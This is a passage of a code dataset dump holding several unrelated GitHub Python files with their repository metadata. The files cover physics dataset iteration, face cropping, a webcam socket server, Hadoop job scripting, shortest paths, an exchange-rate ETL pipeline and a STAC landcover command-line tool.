1\n","repo_name":"TanjidIslam/project-web-app","sub_path":"pagerduty-provision-app/adaptapp/modules/incident.py","file_name":"incident.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41407123620","text":"from __future__ import division\n\nimport itertools\nimport re\n\nimport cached_property\n\nfrom .dbs import (\n get_dataset_record_from_dbs,\n get_file_records_from_dbs,\n)\nfrom .events import Events\n\n\n# Aliases for the urls of the global and regional XRootD redirector servers.\nXROOTD_REDIRECTORS = {\n 'global': 'cms-xrd-global.cern.ch',\n 'fnal': 'cmsxrootd.fnal.gov',\n 'infn': 'xrootd-cms.infn.it',\n}\n\n\nclass DatasetError(Exception):\n pass\n\n\nclass Dataset(object):\n \"\"\"The abstract Dataset class.\n\n Concrete subclasses are defined by overriding the following class attributes:\n\n name : string\n The fully qualified name of the dataset of the form\n \"/primary_dataset/processed_dataset/data_tier\".\n The wildcard character \"*\" is not permitted.\n dbs_instance : string\n One of the following DBS server instances where the dataset is\n registered:\n * global (default)\n * phys01\n * phys02\n * phys03\n * caf\n files : list of paths or urls, optional\n The paths or urls of the dataset's files.\n cross_section : numeric, optional\n The cross section in units of picobarns (pb). 
This attribute should\n only be overridden for datasets which are Monte Carlo samples.\n\n Iterating over a Dataset yields handles to the events contained in the files\n registered on DBS unless the :attr:`files` attribute is overridden.\n\n Parameters\n ----------\n selection : string, optional\n An initial selection applied to the dataset's events.\n chunk_size : numeric, optional\n The maximum chunk size in megabytes (MB) for iterating over the\n dataset's events. The chunk size is defined as the sum of the sizes\n of the dataset's files passed to the event handler. This is ignored\n when overriding the :attr:`files` attribute. The default is 2000 MB.\n valid : bool, optional\n Only iterate over files marked as valid on DBS. This is ignored when\n overriding the :attr:`files` attribute. The default is True.\n redirector : string, optional\n The url of the XRootD redirector server used to locate and access\n the dataset's files. The following regional redirector aliases are\n also recognized:\n * global (default)\n * fnal\n * infn\n This is ignored when overriding the :attr:`files` attribute.\n \"\"\"\n # The dataset name format regular expression.\n DATASET_NAME_FORMAT_RE = re.compile(r'^/\\S+/\\S+/\\S+$')\n\n # The fully qualified dataset name of the format\n # \"/primary_dataset/processed_dataset/data_tier\".\n name = None\n\n # The DBS server instance where the dataset is registered.\n # This defaults to \"global\".\n dbs_instance = 'global'\n\n # The user-defined paths or urls of the dataset's files.\n files = None\n\n # The cross section in units of picobarns (pb).\n # This is only applicable to Monte Carlo samples.\n cross_section = None\n\n def __init__(self, selection=None, chunk_size=2000, redirector=None, valid=True):\n self._validate_dataset_name()\n self.selection = selection\n self.chunk_size = chunk_size\n if redirector in XROOTD_REDIRECTORS:\n self.redirector = XROOTD_REDIRECTORS[redirector]\n else:\n self.redirector = redirector or XROOTD_REDIRECTORS['global']\n self.valid = valid\n\n def __eq__(self, other):\n return isinstance(other, Dataset) and self.name == other.name\n\n def __hash__(self):\n return hash(self.name)\n\n def __iter__(self):\n \"\"\"Yield handles to the dataset's events in chunks.\"\"\"\n if self.files is None:\n if self.redirector is None:\n raise DatasetError('A valid XRootD redirector url is required to access remote files.')\n else:\n file_url_template = 'root://{0}//{{0}}'.format(self.redirector)\n if self.valid:\n records = itertools.ifilter(lambda record: record.is_file_valid, self.dbs_file_records)\n else:\n records = iter(self.dbs_file_records)\n chunk, current_size = [], 0\n for record in records:\n file_url = file_url_template.format(record.logical_file_name)\n file_size_in_MB = record.file_size / 1000000\n if current_size + file_size_in_MB > self.chunk_size:\n yield Events(*chunk, selection=self.selection)\n chunk = [file_url]\n current_size = file_size_in_MB\n else:\n chunk.append(file_url)\n current_size += file_size_in_MB\n yield Events(*chunk, selection=self.selection)\n\n else:\n for f in self.files:\n yield f\n\n def _validate_dataset_name(self):\n if self.name is None or not self.DATASET_NAME_FORMAT_RE.match(self.name) or '*' in self.name:\n raise DatasetError(\n 'The class attribute \"name\" must reference a fully qualified '\n 'dataset name which does not contain wildcard characters.'\n )\n\n @property\n def datatype(self):\n \"\"\"The datatype is \"mc\" for Monte Carlo and \"data\" for data.\"\"\"\n return 'mc' if 
self.cross_section else 'data'\n\n @cached_property.cached_property\n def dbs_dataset_record(self):\n \"\"\"The dataset's information registered with DBS.\"\"\"\n return get_dataset_record_from_dbs(dataset=self.name, instance=self.dbs_instance)\n\n @cached_property.cached_property\n def dbs_file_records(self):\n \"\"\"The dataset's file information registered with DBS.\"\"\"\n return get_file_records_from_dbs(dataset=self.name, instance=self.dbs_instance)\n\n","repo_name":"swang373/vhbbtools","sub_path":"vhbbtools/core/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38059531528","text":"#!/usr/bin/env python\nimport sys, os, math, Image # os is needed for the output-directory handling below\n\ndef Distance(p1,p2):\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n return math.sqrt(dx*dx+dy*dy)\n\ndef ScaleRotateTranslate(image, angle, center = None, new_center = None, scale = None, resample=Image.BICUBIC):\n if (scale is None) and (center is None):\n return image.rotate(angle=angle, resample=resample)\n nx,ny = x,y = center\n sx=sy=1.0\n if new_center:\n (nx,ny) = new_center\n if scale:\n (sx,sy) = (scale, scale)\n cosine = math.cos(angle)\n sine = math.sin(angle)\n a = cosine/sx\n b = sine/sx\n c = x-nx*a-ny*b\n d = -sine/sy\n e = cosine/sy\n f = y-nx*d-ny*e\n return image.transform(image.size, Image.AFFINE, (a,b,c,d,e,f), resample=resample)\n\ndef CropFace(image, eye_left=(0,0), eye_right=(0,0), offset_pct=(0.2,0.2), dest_sz = (70,70)):\n # calculate offsets in original image\n offset_h = math.floor(float(offset_pct[0])*dest_sz[0])\n offset_v = math.floor(float(offset_pct[1])*dest_sz[1])\n # get the direction\n eye_direction = (eye_right[0] - eye_left[0], eye_right[1] - eye_left[1])\n # calc rotation angle in radians\n rotation = -math.atan2(float(eye_direction[1]),float(eye_direction[0]))\n # distance between them\n dist = Distance(eye_left, eye_right)\n # calculate the reference eye-width\n reference = dest_sz[0] - 2.0*offset_h\n # scale factor\n scale = float(dist)/float(reference)\n # rotate original around the left eye\n image = ScaleRotateTranslate(image, center=eye_left, angle=rotation)\n # crop the rotated image\n crop_xy = (eye_left[0] - scale*offset_h, eye_left[1] - scale*offset_v)\n crop_size = (dest_sz[0]*scale, dest_sz[1]*scale)\n image = image.crop((int(crop_xy[0]), int(crop_xy[1]), int(crop_xy[0]+crop_size[0]), int(crop_xy[1]+crop_size[1])))\n # resize it\n image = image.resize(dest_sz, Image.ANTIALIAS)\n return image\n\ndef readFileNames():\n try:\n inFile = open('path_to_created_csv_file.csv')\n except:\n raise IOError('There is no file named path_to_created_csv_file.csv in current directory.')\n return False\n\n picPath = []\n picIndex = []\n\n for line in inFile.readlines():\n if line != '':\n fields = line.rstrip().split(';')\n picPath.append(fields[0])\n picIndex.append(int(fields[1]))\n\n return (picPath, picIndex)\n\n\nif __name__ == \"__main__\":\n [images, indexes] = readFileNames()\n # the following block belongs inside the __main__ guard, otherwise importing\n # this module raises a NameError because 'images' is undefined\n if not os.path.exists(\"modified\"):\n  os.makedirs(\"modified\")\n for img in images:\n  image = Image.open(img)\n  CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.1,0.1), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_10_10_200_200.jpg\")\n  CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.2,0.2), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_20_20_200_200.jpg\")\n  CropFace(image, eye_left=(252,364), eye_right=(420,366), 
offset_pct=(0.3,0.3), dest_sz=(200,200)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_30_30_200_200.jpg\")\n  CropFace(image, eye_left=(252,364), eye_right=(420,366), offset_pct=(0.2,0.2)).save(\"modified/\"+img.rstrip().split('/')[1]+\"_20_20_70_70.jpg\")","repo_name":"RoboticsClubIITK/PETcat_vision","sub_path":"Face_Recog/src/improcess.py","file_name":"improcess.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39238068952","text":"from flask import Flask, render_template, session, request\nfrom flask_socketio import SocketIO, emit, join_room, leave_room, \\\n close_room, rooms, disconnect\n\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n@app.route('/')\ndef cam():\n return render_template(\"liveweb1.html\")\n\n@socketio.on('frame', namespace='/test')\ndef user_video(frame):\n\tfeed = frame\n\tprint(str(feed))\n\t\n\t\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"MathsCoder/gUM","sub_path":"camapp.py","file_name":"camapp.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"138881292","text":"import os\n\n\n# best to collapse the mike index functions in PyCharm and jump to the end of the script\n\n\ndef sim11_index_unite(path):\n # empty lists and counters for mike-type files\n sim11_l = []\n res11_l = []\n sim11res_d = {}\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".sim11\"):\n print(file)\n # add the file path to the list\n element = str(os.path.join(root, file))\n element = element.replace(\"/\", \"\\\\\")\n sim11_l.append(element)\n # read the path to the res11 file\n with open(element) as f:\n lines = f.readlines()\n index = lines.index(\" [Results]\\n\")\n sciezka = element.split(\"\\\\\")\n print(sciezka)\n try:\n hd_res = lines[index + 1].split(\"|\")[1]\n hd_res = hd_res.split(\"\\\\\")\n kropki = len(hd_res[0])\n sciezka = sciezka[:-kropki]\n hd_res = hd_res[1:]\n sciezka = sciezka + hd_res\n except:\n hd_res = lines[index + 1].split(\"'\")[1]\n sciezka = sciezka[:-1]\n print(sciezka)\n hd_res = [hd_res]\n print(hd_res)\n sciezka = sciezka + hd_res\n print(sciezka)\n\n # sciezka = sciezka + hd_res\n hd_res = \"\\\\\".join(sciezka)\n sim11res_d[element] = hd_res\n res11_l.append(hd_res)\n print(sim11res_d)\n\n print(sim11_l)\n return sim11_l, sim11res_d, res11_l\n\n\ndef file_index(path, rozsz):\n # empty lists and counters for mike-type files\n lista = []\n\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".\" + rozsz):\n element = str(os.path.join(root, file))\n element = element.replace(\"/\", \"\\\\\")\n lista.append(element)\n\n return lista\n","repo_name":"michalgrzelak/mike11run","sub_path":"listowanie_sim11.py","file_name":"listowanie_sim11.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29879247023","text":"#!/usr/bin/python3\nfrom os import system, path\nfrom time import time\nfrom sys import argv\nfrom tempfile import mkdtemp\n\nif len(argv) == 2:\n a = b = c = d = int(argv[1])\nelse:\n a = int(argv[1]); b = int(argv[2])\n c = int(argv[3]); d = int(argv[4])\nif len(argv) >= 6:\n exe = argv[5]\nelse:\n exe = \"~/src/hadoop-1.1.2/bin/hadoop\"\nif len(argv) >= 7:\n n = int(argv[6])\nelse:\n n = 1\n\nhadoop_part = exe + \" jar Tiling.jar Tiling\"\n#hdfs = 
\"/scratch/local/\"\nhdfs = \"/scratch/local/\"\n\nrundir = mkdtemp(prefix='runs/',dir=\".\")\nwith open(path.join(rundir, \"foo\"),\"w\") as f:\n f.write(str(a) + \" \" + str(b) + \" \" + str(c) + \" \" + str(d))\n\nsystem(\"hadoop dfs -copyFromLocal \"+rundir+\" \"+hdfs+\"input\")\n\ntimes = []; cpu_time = [];\nmaps = []; reduces = []; \nread = []; written = []; \nmap_irecs = []; map_orecs = []\ncom_irecs = []; com_orecs = []\nred_irecs = []; red_orecs = []\nspills = [];\nsystem(hadoop_part + \" bootstrap \"+hdfs+\"input \"+hdfs+\"tmp0 \"+str(n))\n\nwith open(path.join(rundir,\"stats.dat\"), 'w') as f:\n f.write(\"%4s %9s %12s %16s %16s %5s %5s %10s %10s %10s %10s %10s %10s %10s \\n\" % (\"It\", \"Time\", \"CPU Time\", \"ReadIO\", \"WriteIO\", \"MTask\", \"RTask\", \"MapInRec\", \"MapOutRec\", \"ComInRec\", \"ComOutRec\", \"RedInRec\", \"RedOutRec\", \"Spills\") )\n\nfor i in range(a*b + a*c + b*c-2):\n start = time()\n system(hadoop_part + \" continue \"+hdfs+\"tmp\"+str(i)+\" \"+hdfs+\"tmp\"+str(i+1)+ \" \" + str(n) + \" &> \" + path.join(rundir,\"tmp.log\"))\n times.append(time()-start)\n with open(path.join(rundir,\"tmp.log\"),\"r\") as f:\n lines = f.readlines()\n for line in lines:\n parts = line.partition(\"=\")\n if \"Launched map tasks\" in parts[0]:\n maps.append(int(parts[2]))\n elif \"Launched reduce tasks\" in parts[0]:\n reduces.append(int(parts[2]))\n elif \"Bytes Written\" in parts[0]:\n written.append(int(parts[2]))\n elif \"Bytes Read\" in parts[0]:\n read.append(int(parts[2]))\n elif \"Map input records\" in parts[0]:\n map_irecs.append(int(parts[2]))\n elif \"Map output records\" in parts[0]:\n map_orecs.append(int(parts[2]))\n elif \"Combine input records\" in parts[0]:\n com_irecs.append(int(parts[2]))\n elif \"Combine output records\" in parts[0]:\n com_orecs.append(int(parts[2]))\n elif \"Reduce input records\" in parts[0]:\n red_irecs.append(int(parts[2]))\n elif \"Reduce output records\" in parts[0]:\n red_orecs.append(int(parts[2]))\n elif \"CPU time spent (ms)\" in parts[0]:\n cpu_time.append(int(parts[2]))\n elif \"Spilled Records\" in parts[0]:\n spills.append(int(parts[2]))\n system(\"cat \"+path.join(rundir,\"tmp.log\"))\n with open(path.join(rundir,\"stats.dat\"),\"a\") as f:\n f.write(\"%4d %9.2f %12.2f %16d %16d %5d %5d %10d %10d %10d %10d %10d %10d %10d \\n\" % (i+1, times[-1], cpu_time[-1]/1000., read[-1], written[-1], maps[-1], reduces[-1], map_irecs[-1], map_orecs[-1], com_irecs[-1], com_orecs[-1], red_irecs[-1], red_orecs[-1], spills[-1])) \n system(\"hadoop dfs -copyToLocal \"+hdfs+\"tmp\"+str(i+1)+\"/_logs \"+path.join(rundir,\"log\"+str(i)))\n system(\"cp \"+path.join(rundir,\"tmp.log\")+\" \"+path.join(rundir,\"log\"+str(i)+\"/log\"))\n\nsystem(hadoop_part + \" output \"+hdfs+\"tmp\"+str(a*b+a*c+b*c-2)+\" \"+hdfs+\"out \" + str(n))\nsystem(\"hadoop dfs -copyToLocal \"+hdfs+\"out \"+path.join(rundir,\"out\"))\nwith open(path.join(rundir,\"out/part-r-00000\"), \"r\") as f:\n lines = f.readlines() \n chunks = lines[0].rpartition(\"[\") \n toks = chunks[2].split(\", \")\n vals = []\n for i in range(len(toks)-1):\n vals.append(int(toks[i]))\n chunks = lines[1].rpartition(\"[\") \n toks = chunks[2].split(\", \")\n for i in range(len(toks)-1):\n vals[i] = vals[i] + int(toks[i])\n\nprint(*vals, sep=\", \", end=\"\\n\")\nfor i in range(len(times)):\n print(\"%5.2f, \" % (times[i]), end=\"\")\nprint(sum(times))\n\n\nsystem(\"hadoop dfs -copyToLocal \"+hdfs+\"out 
\"+path.join(rundir,\"out\"))\n\n","repo_name":"maxhutch/big-data-project","sub_path":"hadoop/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41502933351","text":"import sys\nsys.stdin = open('sample_input.txt')\n\n\ndef answer(graph):\n cost = [1001] * (N+1)\n visited = [0] * (N+1)\n # we travel from 0 -> N, so the starting node's cost is 0\n cost[0] = 0\n\n for _ in range(N+1):\n minidx = -1\n minV = 1001\n\n # find the lowest-cost node among those adjacent to the current tree\n for i in range(N+1):\n if not visited[i] and cost[i] < minV:\n minV = cost[i]\n minidx = i\n visited[minidx] = 1\n # update the minimum cost after moving\n for idx, new_cost in enumerate(graph[minidx]):\n if new_cost:\n if not visited[idx] and new_cost + cost[minidx] < cost[idx]:\n cost[idx] = new_cost + cost[minidx]\n return cost[-1]\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, E = map(int, input().split())\n graph = [[0] * (N+1) for _ in range(N+1)]\n for _ in range(E):\n s, e, w = map(int, input().split())\n graph[s][e] = w\n print('#{} {}'.format(t, answer(graph)))\n\n","repo_name":"ousia1022/SWEA-Algorithm","sub_path":"1014/5251_최소이동거리/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71917498490","text":"# here we use the multiprocessing module instead of the threading module\nimport multiprocessing # import the multiprocessing module\nimport time # import the time module\nstart=time.perf_counter()# use perf_counter to measure elapsed time\ndef do_something(seconds):# seconds is the argument to do_something\n print(f\"Sleeping for {seconds} second(s)\")\n time.sleep(seconds)\n return f\"Done sleeping for {seconds} second(s)\"\n\n\nresults=[]# list that will hold the Process handles\nfor _ in range(10):# loop with a throwaway variable\n p1=multiprocessing.Process(target=do_something,args=[1.5])\n p1.start()# start the process\n results.append(p1)\n\n# join each process so that the main process waits for all children to finish\nfor result in results:\n result.join()\n\nfinish=time.perf_counter()\nprint(f\"The time difference is {round(finish-start,2)}\")\n\n\n","repo_name":"psarangi550/PratikAllPythonRepo","sub_path":"Python_Multiprocessing_by_Corey_Schafer/creating_a _multiprocessing_program.py","file_name":"creating_a _multiprocessing_program.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69926224569","text":"from etl_project.connectors.exchange_rates import ExchangeRatesClient\nfrom etl_project.connectors.postgresql import PostgresqlClient\nfrom etl_project.assets.pipeline_logging import PipelineLogging\nfrom etl_project.assets.metadata_logging import MetaDataLogging, MetaDataLoggingStatus\nfrom etl_project.assets.exchange_rates import extract_exchange_rates, transform_exchange_rates\nfrom etl_project.assets.postgresql import SqlTransform\nfrom jinja2 import Environment, FileSystemLoader\nfrom dotenv import load_dotenv\nimport yaml\nfrom pathlib import Path\nimport os\nfrom datetime import datetime, timedelta, date\nfrom sqlalchemy import MetaData, Table, Column, Identity, String, Integer, DATE, DECIMAL\n\nif __name__ == \"__main__\":\n\n    # load environment variables\n    load_dotenv()\n\n    # get config values from yaml 
file\n    yaml_file_path = __file__.replace(\".py\", \".yaml\")\n    if Path(yaml_file_path).exists():\n        with open(yaml_file_path) as yaml_file:\n            yaml_config = yaml.safe_load(yaml_file)\n    else:\n        raise Exception(f\"Missing {yaml_file_path} file!\")\n\n    base_url = yaml_config.get(\"base_url\")\n    base_currency = yaml_config.get(\"base_currency\")\n    log_path = yaml_config.get(\"config\").get(\"log_folder_path\")\n\n    # create logging client\n    DB_USERNAME = os.environ.get(\"DB_USERNAME\")\n    DB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\n    LOGGING_SERVER_NAME = os.environ.get(\"SERVER_NAME\")\n    LOGGING_DATABASE_NAME = os.environ.get(\"DATABASE_NAME\")\n    PORT = os.environ.get(\"PORT\")\n\n    postgresql_logging_client = PostgresqlClient(\n        db_server_name=LOGGING_SERVER_NAME,\n        db_database=LOGGING_DATABASE_NAME,\n        db_username=DB_USERNAME,\n        db_password=DB_PASSWORD,\n        db_port=PORT\n    )\n\n    metadata_logging = MetaDataLogging(pipeline_name=\"exchange_rates\", postgresql_client=postgresql_logging_client)\n    pipeline_logger = PipelineLogging(pipeline_name=\"exchange_rates\", log_path=log_path)\n\n    try:\n        pipeline_logger.log_to_file(message=\"Starting pipeline run\")\n\n        # set up environment variables\n        pipeline_logger.log_to_file(message=\"Getting pipeline environment variables\")\n        ACCESS_KEY = os.environ.get(\"ACCESS_KEY\")\n        DB_USERNAME = os.environ.get(\"DB_USERNAME\")\n        DB_PASSWORD = os.environ.get(\"DB_PASSWORD\")\n        SERVER_NAME = os.environ.get(\"SERVER_NAME\")\n        DATABASE_NAME = os.environ.get(\"DATABASE_NAME\")\n        PORT = os.environ.get(\"PORT\")\n\n        pipeline_logger.log_to_file(message=\"Initialising PostgresqlClient instance\")\n        raw_psql_client = PostgresqlClient(\n            db_server_name=SERVER_NAME,\n            db_username=DB_USERNAME,\n            db_password=DB_PASSWORD,\n            db_port=PORT,\n            db_database=DATABASE_NAME\n        )\n\n        meta = MetaData()\n        rates_table_name = \"rates\"\n        rates_table = Table(rates_table_name,\n                            meta,\n                            Column(\"id\", Integer, Identity(), primary_key=True),\n                            Column(\"currency\", String(3)),\n                            Column(\"rate\", DECIMAL(15, 6)),\n                            Column(\"base_currency\", String(3)),\n                            Column(\"date\", DATE)\n                            )\n\n        pipeline_logger.log_to_file(message=f\"Creating table {rates_table_name} if it does not exist\")\n        raw_psql_client.create_table_if_not_exists(meta=meta, table=rates_table)\n\n        pipeline_logger.log_to_file(message=\"Creating ExchangeRatesClient instance\")\n        exchange_rate_client = ExchangeRatesClient(api_base_url=base_url, api_access_key=ACCESS_KEY)\n\n        pipeline_logger.log_to_file(message=\"Retrieving last extract date\")\n        last_update = raw_psql_client.execute_scalar(query=\"SELECT MAX(date) AS last_updated FROM rates\")\n\n        day_count = 0\n\n        # if no last_update value is retrieved from the database, set last_update to yesterday's date and the days of data to extract to 1\n        # else if last_update exists and is before the current date, set the days of data to extract to the number of days since the last update\n        if last_update is None:\n            last_update = datetime.now().date() - timedelta(days=1)\n            day_count = 1\n        elif last_update < datetime.now().date():\n            day_count = (datetime.now().date() - last_update).days\n\n        # limit the number of days of data to extract to 10\n        if day_count > 10:\n            day_count = 10\n\n        pipeline_logger.log_to_file(message=f\"Extracting rates data for the past {day_count} days\")\n\n        for date_requested in (last_update + timedelta(days=n+1) for n in range(day_count)):\n\n            pipeline_logger.log_to_file(message=f\"Extracting rates data for {date_requested}\")\n            df_forex = 
extract_exchange_rates(exchange_rate_client=exchange_rate_client, base_currency=base_currency, date_requested=date_requested)\n\n if df_forex is not None:\n pipeline_logger.log_to_file(message=f\"Transforming rates DataFrame for {date_requested}\")\n df_forex_transformed = transform_exchange_rates(df=df_forex, base_currency=base_currency, date=date_requested)\n\n if df_forex_transformed is not None:\n pipeline_logger.log_to_file(message=f\"Loading data for {date_requested}\")\n records_affected = raw_psql_client.upsert(table=rates_table, data=df_forex_transformed.to_dict(orient=\"records\")).rowcount\n\n print(records_affected)\n\n # Transform and Load\n staging_postgresql_client = PostgresqlClient(\n db_server_name=os.getenv(\"TARGET_SERVER_NAME\"),\n db_database=os.getenv(\"TARGET_DATABASE_NAME\"),\n db_username=os.getenv(\"TARGET_DB_USERNAME\"),\n db_password=os.getenv(\"TARGET_DB_PASSWORD\"),\n db_port=os.getenv(\"TARGET_PORT\")\n )\n\n transform_environment = Environment(loader=FileSystemLoader(\"etl_project/sql/transform\"))\n\n pipeline_logger.log_to_file(message=\"Preparing transforming and loading\")\n for sql_path in transform_environment.list_templates():\n sql_template = transform_environment.get_template(sql_path)\n table_name = sql_template.make_module().config.get(\"table_name\")\n\n pipeline_logger.log_to_file(message=f\"START: Transforming and loading table {table_name}\")\n\n # Node\n sql_transform = SqlTransform(\n engine=staging_postgresql_client.engine,\n environment=transform_environment,\n table_name=table_name\n )\n\n sql_transform.create_table_as()\n\n pipeline_logger.log_to_file(message=f\"END: Transforming and loading table {table_name} successful\")\n\n ## create DAG\n #dag = TopologicalSorter()\n #dag.add()\n ## run transform\n #for node in tuple(dag.static_order()):\n # node.create_table_as()\n\n pipeline_logger.log_to_file(message=\"Pipeline run successful\")\n metadata_logging.log(status=MetaDataLoggingStatus.RUN_SUCCESS, logs=pipeline_logger.get_logs())\n\n except Exception as e:\n pipeline_logger.logger.error(f\"Pipeline failed with exception {e}\")\n metadata_logging.log(status=MetaDataLoggingStatus.RUN_FAILURE, logs=pipeline_logger.get_logs())\n","repo_name":"wacko-professional/project-1-team-5-dec","sub_path":"etl_project/pipelines/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73746865210","text":"import logging\nimport os\nfrom glob import glob\nfrom typing import Optional\n\nimport click\n\nfrom stactools.nrcan_landcover import cog, extent, stac, utils\nfrom stactools.nrcan_landcover.constants import JSONLD_HREF\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_nrcanlandcover_command(cli: click.Group) -> click.Command:\n \"\"\"Creates the nrcanlandcover command line utility.\"\"\"\n @cli.group(\n \"nrcanlandcover\",\n short_help=(\n \"Commands for working with Natural Resources Canada Land Cover data\"\n ),\n )\n def nrcanlandcover() -> None:\n pass\n\n @nrcanlandcover.command(\n \"create-collection\",\n short_help=\"Creates a STAC collection from NRCan Landcover metadata\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata jsonld\",\n default=JSONLD_HREF,\n )\n def create_collection_command(destination: str, metadata: str) -> None:\n 
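# click passes the parsed --destination/--metadata option values into the\n        # matching function parameters when this subcommand runs.\n        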
\"\"\"Creates a STAC Collection from NRCan Landcover metadata\n\n Args:\n destination (str): Directory used to store the collection json\n metadata (str): Path to a jsonld metadata file - provided by NRCan\n Returns:\n Callable\n \"\"\"\n create_collection_command_fn(destination, metadata)\n\n def create_collection_command_fn(destination: str, metadata: str) -> None:\n metadata_dict = utils.get_metadata(metadata)\n output_path = os.path.join(destination, \"collection.json\")\n collection = stac.create_collection(metadata_dict, metadata)\n collection.set_self_href(output_path)\n collection.normalize_hrefs(destination)\n collection.save()\n collection.validate()\n\n @nrcanlandcover.command(\n \"create-cog\",\n short_help=\"Transform Geotiff to Cloud-Optimized Geotiff.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the COG\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=False,\n help=\"Path to an input GeoTiff\",\n )\n @click.option(\n \"-t\",\n \"--tile\",\n help=\"Tile the tiff into many smaller files.\",\n is_flag=True,\n default=False,\n )\n def create_cog_command(destination: str, source: Optional[str],\n tile: bool) -> None:\n \"\"\"Generate a COG from a GeoTiff. The COG will be saved in the desination\n with `_cog.tif` appended to the name.\n\n Args:\n destination (str): Local directory to save output COGs\n source (str, optional): An input NRCAN Landcover GeoTiff\n tile (bool, optional): Tile the tiff into many smaller files\n \"\"\"\n create_cog_command_fn(destination, source, tile)\n\n def create_cog_command_fn(destination: str, source: Optional[str],\n tile: bool) -> None:\n if not os.path.isdir(destination):\n raise IOError(f'Destination folder \"{destination}\" not found')\n\n if source is None:\n cog.download_create_cog(destination, retile=tile)\n elif tile:\n cog.create_retiled_cogs(source, destination)\n else:\n output_path = os.path.join(\n destination,\n os.path.basename(source)[:-4] + \"_cog.tif\")\n cog.create_cog(source, output_path)\n\n @nrcanlandcover.command(\n \"create-item\",\n short_help=\"Create a STAC item using JSONLD metadata and a COG\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC json\",\n )\n @click.option(\n \"-c\",\n \"--cog\",\n required=True,\n help=\"COG href\",\n )\n @click.option(\n \"-e\",\n \"--extent-asset\",\n required=False,\n help=\"An asset representing the extent of the STAC Item\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata description.\",\n default=JSONLD_HREF,\n )\n def create_item_command(destination: str, cog: str,\n extent_asset: Optional[str],\n metadata: str) -> None:\n \"\"\"Generate a STAC item using the metadata, with an asset url as provided.\n\n Args:\n destination (str): Local directory to save the STAC Item json\n cog (str): location of a COG asset for the item\n extent_asset (str, optional): File containing a GeoJSON asset of the extent\n metadata (str): url containing the NRCAN Landcover JSONLD metadata\n \"\"\"\n create_item_command_fn(destination, cog, extent_asset, metadata)\n\n def create_item_command_fn(destination: str, cog: str,\n extent_asset: Optional[str],\n metadata: str) -> None:\n jsonld_metadata = utils.get_metadata(metadata)\n output_path = os.path.join(destination,\n os.path.basename(cog)[:-4] + \".json\")\n if extent_asset is None and os.path.exists(\n os.path.join(destination, \"extent.geojson\")):\n extent_asset = 
os.path.join(destination, \"extent.geojson\")\n item = stac.create_item(jsonld_metadata,\n destination,\n metadata,\n cog,\n extent_asset_href=extent_asset)\n item.set_self_href(output_path)\n item.make_asset_hrefs_relative()\n item.save_object()\n item.validate()\n\n @nrcanlandcover.command(\n \"create-extent-asset\",\n short_help=\"Create extent asset for the STAC Item\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the extent asset\",\n )\n @click.option(\n \"-m\",\n \"--metadata\",\n help=\"The url to the metadata description.\",\n default=JSONLD_HREF,\n )\n @click.option(\n \"-c\",\n \"--cog\",\n required=False,\n help=\"COG href\",\n )\n def create_extent_asset_command(destination: str, metadata: str,\n cog: Optional[str]) -> None:\n \"\"\"Generate a GeoJSON of the extent of the STAC Item.\n\n Args:\n destination (str): Local directory to save output COGs\n metadata (str): URL to the metadata\n \"\"\"\n create_extent_asset_command_fn(destination, metadata, cog)\n\n def create_extent_asset_command_fn(destination: str, metadata: str,\n cog: Optional[str]) -> None:\n if not os.path.isdir(destination):\n raise IOError(f'Destination folder \"{destination}\" not found')\n\n jsonld_metadata = utils.get_metadata(metadata)\n if cog is not None:\n file_name = os.path.basename(cog).replace(\".tif\",\n \"_extent.geojson\")\n else:\n file_name = \"extent.geojson\"\n output_path = os.path.join(destination, file_name)\n extent.create_extent_asset(jsonld_metadata, output_path, cog)\n\n @nrcanlandcover.command(\n \"build-full-collection\",\n short_help=\"Creates a STAC collection with Items and Assets\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n 